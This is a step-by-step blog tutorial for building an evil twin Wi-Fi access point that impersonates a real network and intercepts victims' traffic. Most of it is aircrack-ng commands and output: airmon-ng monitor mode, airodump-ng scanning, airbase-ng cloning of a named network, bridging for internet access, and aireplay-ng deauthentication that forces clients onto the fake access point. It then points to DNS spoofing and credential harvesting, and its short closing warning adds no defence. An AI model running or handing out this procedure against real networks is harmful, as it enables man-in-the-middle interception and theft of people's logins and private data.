How to Create an Evil Twin Access Point; Step-by-Step Guide

Step-by-Step Guide: Creating an Evil Twin

An Evil Twin Access Point is a malicious wireless access point that is set up to mimic a legitimate one. It can be used to intercept sensitive information such as login credentials, credit card information, and other private data.

In this post, I will provide a step-by-step guide on how to create an Evil Twin Access Point. You will learn how to set up a fake access point that looks like the real one, and how to intercept data from unsuspecting victims.

Follow our guide and learn how to create an Evil Twin Access Point in just a few easy steps.

*What is an Evil Twin Access Point?
*
An evil twin is a fake wireless access point that appears as a genuine hotspot offered by a legitimate provider. The idea is to set up a malicious wireless network with the same SSID name as the original one.

Devices connecting to a Wi-Fi network like laptops, tablets, and smartphones have no way to distinguish between two Wi-Fi networks with the same SSID name. This enables hackers to set up malicious wireless networks that can capture traffic and extract sensitive information from victims.

*Enable Monitor Mode
*
To start with this tutorial, ensure that your wireless card is compatible with the aircrack-ng suite and has monitor mode enabled.

Aircrack-ng is a popular set of tools used to crack wireless networks. It is a suite of tools that includes aircrack-ng (for cracking WEP and WPA-PSK keys), airmon-ng (for setting up monitor mode on wireless cards), and airodump-ng (for capturing wireless traffic).

Aircrack-ng is an open-source project and is available for Windows, Linux, and macOS. You can verify if it's functioning correctly by entering the following command:

airmon-ng check kill

This command will check if the wireless card is supported by the aircrack-ng suite and also disable any processes that may interfere with it.

The next step is to enable monitor mode on your wireless interface. This can be accomplished by executing the airmon-ng start wlan0 command.

airmon-ng start wlan0

This will change wlan0 to wlan0mon, which indicates that your wireless interface is now in monitor mode.

*Locate the Target Wireless Network
*
The second step is to start scanning nearby wireless routers and locate the Wi-Fi network which you want to clone. Execute the following command:

airodump-ng wlan0mon
CH  6][ BAT: 3 hours 9 mins ][ Elapsed: 8 s ][ 2014-05-20 11:10

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
28:EF:01:34:64:92 -29 19 1 0 6 54e WPA2 CCMP PSK Linksys
28:EF:01:35:34:85 -42 17 0 0 6 54e WPA2 CCMP PSK SkyNet
28:EF:01:34:64:91 -29 19 1 0 1 54e WPA2 CCMP PSK TP-LINK
28:EF:02:33:38:86 -42 17 0 0 11 54e WPA2 CCMP PSK CISCO-Net

BSSID STATION PWR Rate Lost Packets Probes

28:EF:01:35:34:85 28:EF:01:23:46:68 -57 0 - 1 0 1

The wireless network I will be cloning in this tutorial is the SkyNet network with BSSID 28:EF:01:35:34:85 and channel 6.

Create the Evil Twin

Once you’ve found the network which you wish to clone, run the following command in another terminal:

airbase-ng -a 28:EF:01:35:34:85 –e SkyNet -c 6 wlan0mon
$ airbase-ng -a 28:EF:01:35:34:85 --essid SkyNet -c 6 wlan0mon
21:39:29  Created tap interface at0
21:39:29  Trying to set MTU on at0 to 1500
21:39:29  Trying to set MTU on wlan0mon to 1800
21:39:29  Access Point with BSSID 28:EF:01:35:34:85 started.

This command creates an Evil Twin network with the SSID name SkyNet, however, it will not be able to provide internet access yet.

Provide Internet Access to the Evil Twin

I will add the bridge interface, called fake, you can name it any way you like.

brctl addbr fake

Now add the two interfaces you’re bridging, eth0 and at0 (make sure eth0 has internet access).

brctl addif fake eth0
brctl addif fake at0

Assign IP addresses to the interface and bring them up using ifconfig:

ifconfig at0 0.0.0.0 up
ifconfig fake up

You can take a look at the bridge network interface with ifconfig:

ifconfig
at0       Link encap:Ethernet  HWaddr 74:85:2a  
inet6 addr: fe80::7685:2aff:5b08/64 Scope:Link
UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
RX packets:4 errors:0 dropped:0 overruns:0 frame:0
TX packets:349 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:500 
RX bytes:540 (540.0 B)  TX bytes:54845 (53.3 KiB)
eth0 Link encap:Ethernet HWaddr c8:bc:c8
inet addr:10.0.0.19 Bcast:10.0.0.255 Mask:255.255.255.0
inet6 addr: fe80::cabc:a6c1/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:640 errors:0 dropped:0 overruns:0 frame:0
TX packets:529 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:457344 (446.6 KiB) TX bytes:94347 (92.2 KiB)
Interrupt:17
fake Link encap:Ethernet HWaddr 74:85:2a
inet addr:10.0.0.194 Bcast:10.0.0.255 Mask:255.255.255.0
inet6 addr: fe80:::fe97:5b08/64 Scope:Link
inet6 addr: 2601:d335:7685:2aff:fe97:5b08/64 Scope:Global
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:859 errors:0 dropped:0 overruns:0 frame:0
TX packets:684 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:492405 (480.8 KiB) TX bytes:130130 (127.0 KiB)

*Kick Wireless Clients from the Legitimate AP
*
The next step is to kick wireless clients off the legitimate AP, in my case, that’s SkyNet network. You can do this by using aireplay-ng.

aireplay-ng --deauth 1000 -a 28:EF:01:35:34:85 wlan0mon

This command kicks wireless clients from the real access point network, forcing them to connect to the malicious access point.

As you can see in the output below, a client has associated with my evil twin. This information is found in the airebase-ng terminal (client 28:EF:01:23:46:68 associated).

$ airbase-ng -a 28:EF:01:35:34:85 --essid SkyNet -c 6 wlan0mon
14:50:56  Created tap interface at0
14:50:56  Trying to set MTU on at0 to 1500
14:50:56  Trying to set MTU on wlan5 to 1800
14:50:56  Access Point with BSSID 28:EF:01:35:34:85 started.
14:58:55  Client 28:EF:01:23:46:68 associated (WPA2;CCMP) to ESSID: "SkyNet"
15:03:24  Client 28:EF:01:23:46:68 associated (WPA2;CCMP) to ESSID: "SkyNet"

At this point, all the victim’s traffic is going through the attacker’s machine, he or she can capture sensitive information since it’s technically a Man-in-the-Middle attack.

The attacker can perform various attacks like DNS spoofing which redirects the victim to a cloned or fake login page. Once the victim tries to login, the hacker harvests the credentials.

Conclusion

In today's digital age, using public Wi-Fi networks has become a common practice for many people. However, it's important to be aware of the risks associated with connecting to these networks, as they can be vulnerable to cyber-attacks and hacking attempts.